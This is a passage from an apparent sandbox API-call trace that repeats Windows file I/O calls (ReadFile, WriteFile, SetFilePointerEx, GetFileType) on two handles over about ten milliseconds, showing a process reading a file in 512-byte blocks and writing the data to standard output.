lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, 
lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.796] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.796] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.798] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.798] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, 
lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 
| out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.799] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.799] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 
[0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.800] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.800] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 
[0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.801] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.801] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, 
lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.803] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.803] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType 
(hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.804] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.804] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, 
lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.806] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.806] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, 
